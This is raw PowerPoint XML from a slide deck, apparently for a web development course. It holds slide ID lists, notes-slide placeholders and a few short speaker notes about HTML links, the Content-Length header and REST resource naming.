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1"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="258" r:id="rId3"/>
    <p:sldId id="259" r:id="rId4"/>
    <p:sldId id="260" r:id="rId5"/>
    <p:sldId id="261" r:id="rId6"/>
    <p:sldId id="262" r:id="rId7"/>
    <p:sldId id="263" r:id="rId8"/>
    <p:sldId id="544" r:id="rId9"/>
    <p:sldId id="541" r:id="rId10"/>
    <p:sldId id="542" r:id="rId11"/>
    <p:sldId id="543" r:id="rId12"/>
    <p:sldId id="264" r:id="rId13"/>
    <p:sldId id="265" r:id="rId14"/>
    <p:sldId id="266" r:id="rId15"/>
    <p:sldId id="267" r:id="rId16"/>
    <p:sldId id="268" r:id="rId17"/>
    <p:sldId id="516" r:id="rId18"/>
    <p:sldId id="269" r:id="rId19"/>
    <p:sldId id="270" r:id="rId20"/>
    <p:sldId id="271" r:id="rId21"/>
    <p:sldId id="272" r:id="rId22"/>
    <p:sldId id="273" r:id="rId23"/>
    <p:sldId id="274" r:id="rId24"/>
    <p:sldId id="276" r:id="rId25"/>
    <p:sldId id="277" r:id="rId26"/>
    <p:sldId id="520" r:id="rId27"/>
    <p:sldId id="521" r:id="rId28"/>
    <p:sldId id="523" r:id="rId29"/>
    <p:sldId id="524" r:id="rId30"/>
    <p:sldId id="525" r:id="rId31"/>
    <p:sldId id="526" r:id="rId32"/>
    <p:sldId id="527" r:id="rId33"/>
    <p:sldId id="531" r:id="rId34"/>
    <p:sldId id="532" r:id="rId35"/>
    <p:sldId id="533" r:id="rId36"/>
    <p:sldId id="534" r:id="rId37"/>
    <p:sldId id="535" r:id="rId38"/>
    <p:sldId id="536" r:id="rId39"/>
    <p:sldId id="537" r:id="rId40"/>
    <p:sldId id="538" r:id="rId41"/>
    <p:sldId id="539" r:id="rId42"/>
    <p:sldId id="540" r:id="rId43"/>
    <p:sldId id="553" r:id="rId44"/>
    <p:sldId id="286" r:id="rId45"/>
    <p:sldId id="287" r:id="rId46"/>
    <p:sldId id="288" r:id="rId47"/>
    <p:sldId id="292" r:id="rId48"/>
    <p:sldId id="556" r:id="rId49"/>
    <p:sldId id="294" r:id="rId50"/>
    <p:sldId id="295" r:id="rId51"/>
    <p:sldId id="296" r:id="rId52"/>
    <p:sldId id="626" r:id="rId53"/>
    <p:sldId id="300" r:id="rId54"/>
    <p:sldId id="301" r:id="rId55"/>
    <p:sldId id="302" r:id="rId56"/>
    <p:sldId id="303" r:id="rId57"/>
    <p:sldId id="304" r:id="rId58"/>
    <p:sldId id="305" r:id="rId59"/>
    <p:sldId id="557" r:id="rId60"/>
    <p:sldId id="603" r:id="rId61"/>
    <p:sldId id="615" r:id="rId62"/>
    <p:sldId id="617" r:id="rId63"/>
    <p:sldId id="618" r:id="rId64"/>
    <p:sldId id="616" r:id="rId65"/>
    <p:sldId id="546" r:id="rId66"/>
    <p:sldId id="606" r:id="rId67"/>
    <p:sldId id="604" r:id="rId68"/>
    <p:sldId id="605" r:id="rId69"/>
    <p:sldId id="306" r:id="rId70"/>
    <p:sldId id="307" r:id="rId71"/>
    <p:sldId id="308" r:id="rId72"/>
    <p:sldId id="309" r:id="rId73"/>
    <p:sldId id="310" r:id="rId74"/>
    <p:sldId id="613" r:id="rId75"/>
    <p:sldId id="311" r:id="rId76"/>
    <p:sldId id="313" r:id="rId77"/>
    <p:sldId id="554" r:id="rId78"/>
    <p:sldId id="555" r:id="rId79"/>
    <p:sldId id="614" r:id="rId80"/>
    <p:sldId id="619" r:id="rId81"/>
    <p:sldId id="607" r:id="rId82"/>
    <p:sldId id="289" r:id="rId83"/>
    <p:sldId id="290" r:id="rId84"/>
    <p:sldId id="291" r:id="rId85"/>
    <p:sldId id="608" r:id="rId86"/>
    <p:sldId id="609" r:id="rId87"/>
    <p:sldId id="611" r:id="rId88"/>
    <p:sldId id="314" r:id="rId89"/>
    <p:sldId id="315" r:id="rId90"/>
    <p:sldId id="316" r:id="rId91"/>
    <p:sldId id="317" r:id="rId92"/>
    <p:sldId id="318" r:id="rId93"/>
    <p:sldId id="627" r:id="rId94"/>
    <p:sldId id="612" r:id="rId95"/>
    <p:sldId id="610" r:id="rId96"/>
    <p:sldId id="321" r:id="rId97"/>
    <p:sldId id="545" r:id="rId98"/>
    <p:sldId id="620" r:id="rId99"/>
    <p:sldId id="621" r:id="rId100"/>
    <p:sldId id="322" r:id="rId101"/>
    <p:sldId id="283" r:id="rId102"/>
    <p:sldId id="284" r:id="rId103"/>
    <p:sldId id="324" r:id="rId104"/>
    <p:sldId id="325" r:id="rId105"/>
    <p:sldId id="326" r:id="rId106"/>
    <p:sldId id="327" r:id="rId107"/>
    <p:sldId id="559" r:id="rId108"/>
    <p:sldId id="622" r:id="rId109"/>
    <p:sldId id="328" r:id="rId110"/>
    <p:sldId id="329" r:id="rId111"/>
    <p:sldId id="330" r:id="rId112"/>
    <p:sldId id="331" r:id="rId113"/>
    <p:sldId id="332" r:id="rId114"/>
    <p:sldId id="333" r:id="rId115"/>
    <p:sldId id="623" r:id="rId116"/>
    <p:sldId id="624" r:id="rId117"/>
    <p:sldId id="563" r:id="rId118"/>
    <p:sldId id="625" r:id="rId119"/>
    <p:sldId id="561" r:id="rId120"/>
    <p:sldId id="334" r:id="rId121"/>
    <p:sldId id="560" r:id="rId122"/>
    <p:sldId id="335" r:id="rId123"/>
    <p:sldId id="336" r:id="rId124"/>
    <p:sldId id="337" r:id="rId125"/>
    <p:sldId id="565" r:id="rId126"/>
    <p:sldId id="566" r:id="rId127"/>
    <p:sldId id="564" r:id="rId128"/>
    <p:sldId id="338" r:id="rId129"/>
    <p:sldId id="339" r:id="rId130"/>
    <p:sldId id="340" r:id="rId131"/>
    <p:sldId id="341" r:id="rId132"/>
    <p:sldId id="342" r:id="rId133"/>
    <p:sldId id="343" r:id="rId134"/>
    <p:sldId id="344" r:id="rId135"/>
    <p:sldId id="345" r:id="rId136"/>
    <p:sldId id="346" r:id="rId137"/>
    <p:sldId id="567" r:id="rId138"/>
    <p:sldId id="576" r:id="rId139"/>
    <p:sldId id="347" r:id="rId140"/>
    <p:sldId id="628" r:id="rId141"/>
    <p:sldId id="352" r:id="rId142"/>
    <p:sldId id="353" r:id="rId143"/>
    <p:sldId id="354" r:id="rId144"/>
    <p:sldId id="355" r:id="rId145"/>
    <p:sldId id="356" r:id="rId146"/>
    <p:sldId id="357" r:id="rId147"/>
    <p:sldId id="358" r:id="rId148"/>
    <p:sldId id="359" r:id="rId149"/>
    <p:sldId id="360" r:id="rId150"/>
    <p:sldId id="361" r:id="rId151"/>
    <p:sldId id="629" r:id="rId152"/>
    <p:sldId id="630" r:id="rId153"/>
    <p:sldId id="362" r:id="rId154"/>
    <p:sldId id="363" r:id="rId155"/>
    <p:sldId id="364" r:id="rId156"/>
    <p:sldId id="365" r:id="rId157"/>
    <p:sldId id="366" r:id="rId158"/>
    <p:sldId id="367" r:id="rId159"/>
    <p:sldId id="369" r:id="rId160"/>
    <p:sldId id="370" r:id="rId161"/>
    <p:sldId id="371" r:id="rId162"/>
    <p:sldId id="372" r:id="rId163"/>
    <p:sldId id="582" r:id="rId164"/>
    <p:sldId id="376" r:id="rId165"/>
    <p:sldId id="377" r:id="rId166"/>
    <p:sldId id="571" r:id="rId167"/>
    <p:sldId id="378" r:id="rId168"/>
    <p:sldId id="379" r:id="rId169"/>
    <p:sldId id="568" r:id="rId170"/>
    <p:sldId id="380" r:id="rId171"/>
    <p:sldId id="381" r:id="rId172"/>
    <p:sldId id="569" r:id="rId173"/>
    <p:sldId id="382" r:id="rId174"/>
    <p:sldId id="572" r:id="rId175"/>
    <p:sldId id="573" r:id="rId176"/>
    <p:sldId id="574" r:id="rId177"/>
    <p:sldId id="579" r:id="rId178"/>
    <p:sldId id="580" r:id="rId179"/>
    <p:sldId id="575" r:id="rId180"/>
    <p:sldId id="383" r:id="rId181"/>
    <p:sldId id="384" r:id="rId182"/>
    <p:sldId id="570" r:id="rId183"/>
    <p:sldId id="631" r:id="rId184"/>
    <p:sldId id="633" r:id="rId185"/>
    <p:sldId id="385" r:id="rId186"/>
    <p:sldId id="386" r:id="rId187"/>
    <p:sldId id="387" r:id="rId188"/>
    <p:sldId id="558" r:id="rId189"/>
    <p:sldId id="390" r:id="rId190"/>
    <p:sldId id="632" r:id="rId191"/>
    <p:sldId id="391" r:id="rId192"/>
    <p:sldId id="392" r:id="rId193"/>
    <p:sldId id="393" r:id="rId194"/>
    <p:sldId id="394" r:id="rId195"/>
    <p:sldId id="395" r:id="rId196"/>
    <p:sldId id="410" r:id="rId197"/>
    <p:sldId id="388" r:id="rId198"/>
    <p:sldId id="602" r:id="rId199"/>
    <p:sldId id="423" r:id="rId200"/>
    <p:sldId id="578" r:id="rId201"/>
    <p:sldId id="412" r:id="rId202"/>
    <p:sldId id="413" r:id="rId203"/>
    <p:sldId id="414" r:id="rId204"/>
    <p:sldId id="415" r:id="rId205"/>
    <p:sldId id="416" r:id="rId206"/>
    <p:sldId id="417" r:id="rId207"/>
    <p:sldId id="418" r:id="rId208"/>
    <p:sldId id="419" r:id="rId209"/>
    <p:sldId id="420" r:id="rId2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FFC4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1361" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="137" d="100"/>
          <a:sy n="137" d="100"/>
        </p:scale>
        <p:origin x="1464" y="19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C9FC9B-74B5-8E40-A9E6-386E1D7938B0}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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25540E-22BB-A04D-A531-AB9E834E7175}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32886755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627F3-D851-F84A-B61E-59E538B40377}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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F56DF1-56D1-AD49-8B73-A437628FAEE9}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="819202"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19203"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C4332C-DFF2-C546-9C2B-CF55366E8FAD}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>203</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234662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D0C126-A6D4-9647-88C7-1D5AE2B08AFA}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>204</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1119234" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1119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1419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CCBA44-73C0-8A41-980D-1FFDFAF35AA5}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>205</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1120258" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1120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017256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768BCE-114F-FD45-8DDC-5570750C31DD}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>206</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184457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AEB85A-CA61-F841-A480-06FF6C80DF0E}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>207</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795258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8FD6F-CDF0-9C47-AD01-0CEBF95F8426}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>208</a:t>
            </a:fld>
            <a:endParaRPr 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9294893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AB66C4-2799-F449-801A-954A6F23C311}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>209</a:t>
            </a:fld>
            <a:endParaRPr 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03982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C7CFE-42CA-704B-AC6D-81D67F8E971F}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="821250"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21251"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12FA85-2742-0240-B209-D0A1C977E349}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="823298"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23299"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5F90A7-732C-7143-B5DB-6E6499103AB8}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="825346"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25347"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18081B-63D5-7142-B65D-5D4A49CF5E7B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="827394"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27395"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4F519B-5A73-D949-9B20-0FCD4655D765}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>20</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B3018-A6AC-1845-90DF-98A94F8513F2}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="829442"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29443"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381C2-F425-084C-9747-66CED0058B72}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="831490"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31491"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3A8B6A-9D41-1C41-B96D-F912B3E26C9C}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="833538"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33539"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F9ACFA-FF80-AB45-93DD-8FDE12B53D38}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="837634"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37635"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C88AAD-4B49-4A40-B661-A3F93C3AFEA5}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="744450" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74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30B458-ACB7-B744-8F88-47E3BAD56FB8}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="839682"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39683"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30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2247059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AKA putting the hypertext in HTML.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What does </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> stand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> for?</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31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="299533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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3084569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r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> do we need the Content-Length header?</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42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="252475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567BE1-A3A1-3F4B-9CF7-C3A28E4EAD5B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>44</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7661DF-9432-BC4D-AFC6-CA2EBB6AB0F9}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>45</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CB217C-BB54-DA48-8CA6-72A2E9BB9DD0}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>46</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D34F1D-BCD9-5A47-B5A8-A10EABEBAFC7}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>47</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C4EB55-1186-EA49-B656-C2FE18D1E7D5}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="747522" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="747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96CDBE-5D53-184B-A125-35372ADB7D05}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="745474" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74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6F2BC-3D2A-D447-A062-5CC2A14535FC}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="748546" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74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060ABE-4A45-DD49-94C6-805DF5CED225}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="749570" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74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2D98BE-3E71-5247-B3E3-409B557270CF}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="752642" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"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5130A7-39D8-5546-B572-40B6C5F71831}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>54</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F5CEEB-D146-8A46-BACF-9C7177A79F30}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="753666" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75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1892B-7FAC-9F44-93CD-A504B5488872}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>56</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16AF68-0DDD-DD40-9685-BC95B22263C6}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1084418" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1084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restfulapi.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/resource-naming/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3125540E-22BB-A04D-A531-AB9E834E7175}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20350421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25540E-22BB-A04D-A531-AB9E834E7175}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3502123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301ECF-9C57-194C-A443-053F3F63EC80}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="754690" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75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66D777-CF8C-5342-A033-9312DA20CFBF}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="746498" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74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72DDE2-BC5C-CE42-9AF1-B22813D632F9}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="755714" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75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6B4D6F-7015-AB44-B1C2-FE94F18B2694}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="756738" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75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986C1E-46C1-AB46-BEF6-C67592B13BD6}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="757762" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
